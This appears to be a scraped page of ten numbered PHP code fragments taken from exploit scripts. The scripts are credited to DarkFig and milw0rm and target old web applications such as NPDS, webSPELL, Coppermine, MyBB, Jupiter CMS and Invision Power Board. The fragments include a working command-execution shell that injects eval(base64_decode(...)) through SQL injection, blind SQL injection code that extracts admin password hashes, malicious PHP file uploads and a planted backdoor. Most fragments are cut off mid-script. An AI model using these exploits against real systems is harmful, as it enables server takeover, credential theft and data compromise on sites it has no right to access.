Exemplo n.º 1
0
function main()
{
    // :)
    $web = new phpsploit();
    $web->agent('Mozilla Firefox');
    // Hey ya :)
    head();
    // Target
    $url = get_p('url', true);
    // Proxy options
    $prh = get_p('proxhost');
    $pra = get_p('proxauth');
    // Use a proxy ?
    if ($prh) {
        // host:ip
        $web->proxy($prh);
        // Authentication
        if ($pra) {
            $web->proxyauth($pra);
        }
    }
    // Single quote bypass
    $byp = "1');";
    // PHP code
    $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    // Separator
    $s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
    $c_sep = "print('{$s_sep}');";
    // Final PHP code
    $final = $byp . $c_sep . $php . $c_sep . 'exit();//';
    // Welcome guess !
    while (($cmd = cmd_prompt()) !== false) {
        // magic_quotes_gpc bypass
        $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
        // Go =]
        $web->get($url . 'index.php?fields=' . to_char($final) . ',1');
        // Result
        $res = explode($s_sep, $web->getcontent());
        // Erf
        if (!isset($res[1])) {
            print "\nFailed";
            exit(1);
        } else {
            if (empty($res[1])) {
                print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            } else {
                print "\n" . $res[1];
            }
        }
    }
    return;
}
Exemplo n.º 2
0
#!/usr/bin/php
<?php 
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
if ($argc < 3) {
    print "\n  TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n   NOTE | Works regardless of php settings\n  USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy     If you wanna use a proxy <proxyhost:proxyport> \n        | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
    exit(1);
}
$url = getparam('url', 1);
$pro = getparam('proxy');
$pra = getparam('proyauth');
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
    $xpl->proxy($pro);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125.  settype ($lid, "integer");
# 126.  PrintPage("links",$DB, $lid);
#
# 30.  if ($oper=="links") {
# 31.  $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32.  list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40.  if ($DB) {
# 41.  $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
Exemplo n.º 3
0
<?php

/*
Title:          Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
$url = ' http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
$xpl->formdata($arr);
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
Exemplo n.º 4
0
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if ($argc < 5) {
    print "\n------   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   ------\n-----------------------------------------------------------------------\nPHP conditions: register_globals=On\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url <> -file <> [Options]\n Params: -url       For example http://victim.com/webspell/ \n         -file      The file you wanna upload (c99shell.php...)\nOptions: -prefix    Table prefix (default=webs)\n         -upmatch   The match which returns TRUE for the upload\n         -sqlmatch  The match which returns TRUE for the SQL injection\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/webspell/ -file c99shell.php\n-----------------------------------------------------------------------\n";
    exit(1);
}
$url = getparam('url', 1);
$file = getparam('file', 1);
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs';
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
Exemplo n.º 5
0
    print "\nExample.......: php xpl.php http://c.com/ admin passwd";
    print "\n---------------------------------------------------------\n";
    exit(1);
}
/*/
 [0] => xpl.php         [1] => http://localhost/cpg1410/
 [2] => root            [3] => toor
 [4] => localhost:8200  [5] => user:passwd
/*/
$url = $argv[1];
$adu = $argv[2];
$adp = $argv[3];
$pxs = $argv[4];
$pxa = $argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
    print "\nstatus> Using a proxy {$pxs}";
    $xpl->proxy($pxs);
}
if (!empty($pxa)) {
    print "\nstatus> Basic proxy authentification {$pxa}";
    $xpl->proxyauth($pxa);
}
/*/
 Table prefix.
Exemplo n.º 6
0
# They must correct the problem at the source =)
#
if ($argc < 3) {
    print "\n---  MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit  ---\n-----------------------------------------------------------------------\nPHP conditions: none\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url http://victim.com/ [Options]\n Params: -url       For example http://victim.com/myBB/\nOptions: -debug     Debug mod activated (debug_mybb.html)\n         -truetime  Server response time which returns true\n         -benchmark You can change the value used in benchmark()\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\n   Note: If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
    exit(1);
}
$url = getparam('url', 1);
$debug = getparam('debug') != '' ? 1 : 0;
$benchmark = getparam('benchmark') != '' ? getparam('benchmark') : '1000000';
$proxy = getparam($proxy);
$proxyauth = getparam($proxyauth);
$backdoor = 'uploads/avatars/backdoor.php';
# inc/cache/backdoor.php
$filetoed = 'index.lang.php';
$xpl = new phpsploit();
$xpl->agent('Firefox');
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
if ($debug) {
    debug(1);
}
# There is two solutions to be logged in as administrator.
#
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
#              uid: 1
Exemplo n.º 7
0
        return false;
    }
}
if ($_SERVER['argc'] == 7 or $_SERVER['argc'] == 8) {
    $host = $_SERVER['argv'][1];
    $path = $_SERVER['argv'][2];
    $prefix = $_SERVER['argv'][3];
    $gid = $_SERVER['argv'][4];
    $pid = $_SERVER['argv'][5];
    $uid = $_SERVER['argv'][6];
    if ($_SERVER['argc'] == 8) {
        $proxy = $_SERVER['argv'][7];
        echo "Proxy: {$proxy} \n";
        $xpl->proxy($proxy);
    }
    $xpl->agent('Internet Explorer');
    echo "exploiting...\n";
    echo "md5-hash: ";
    for ($i = 1; $i <= 32; $i++) {
        $found = false;
        $h = 48;
        while (!$found and $h <= 57) {
            if (istrue($xpl, $host, $path, $prefix, $gid, $pid, $uid, $i, $h)) {
                $found = true;
                echo chr($h);
            }
            $h++;
        }
        if (!$found) {
            $h = 97;
            while (!$found and $h <= 122) {
Exemplo n.º 8
0
    print "\nRisk.level....: High";
    print "\nSrc.download..: www.alexphpteam.com";
    print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
    print "\nCredits.......: DarkFig";
    print "\n---------------------------------------------------------";
    print "\nUsage.........: php xpl.php <url>";
    print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
    print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
    print "\n---------------------------------------------------------\n";
    exit(1);
}
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if (!empty($prs)) {
    $xpl->proxy($prs);
}
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
/*/
 |
 | index.php
 | =========
 | ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
 |
 |
 | livre_include.php -> Local File Inclusion
 | =================
Exemplo n.º 9
0
     * @example $this->reset()
     * 
     */
    function reset($func = '')
    {
        switch ($func) {
            case 'header':
                $this->header = array();
                break;
            case 'cookie':
                $this->cookie = array();
                break;
            default:
                $this->cookiejar = '';
                $this->header = array();
                $this->cookie = array();
                $this->allowredirection = '';
                break;
        }
    }
}
$web = new phpsploit();
$web->cookiejar(1);
$web->agent('Mozilla Firefox');
$ipb = new ipb_spl();
$ipb->web =& $web;
$ipb->main();
?>

# milw0rm.com [2008-08-29]
Exemplo n.º 10
0
# ------------------------------------------------
# Author: DarkFig <*****@*****.**>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE);
# This file require the PhpSploit class.
$xpl = new phpsploit();
$url = 'http://localhost/nk/';
# url
$prx = '';
# proxy <proxyip>:<proxyport>
$pra = '';
# basic authentification <proxyuser:proxypwd>
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($prx) {
    $xpl->proxy($prx);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
$config = array();
$config[] = 'nuked';
# table prefix
$config[] = 'nuked';
# cookie prefix
$config[] = 'ORDER by date LIMIT 1';
# sql conditions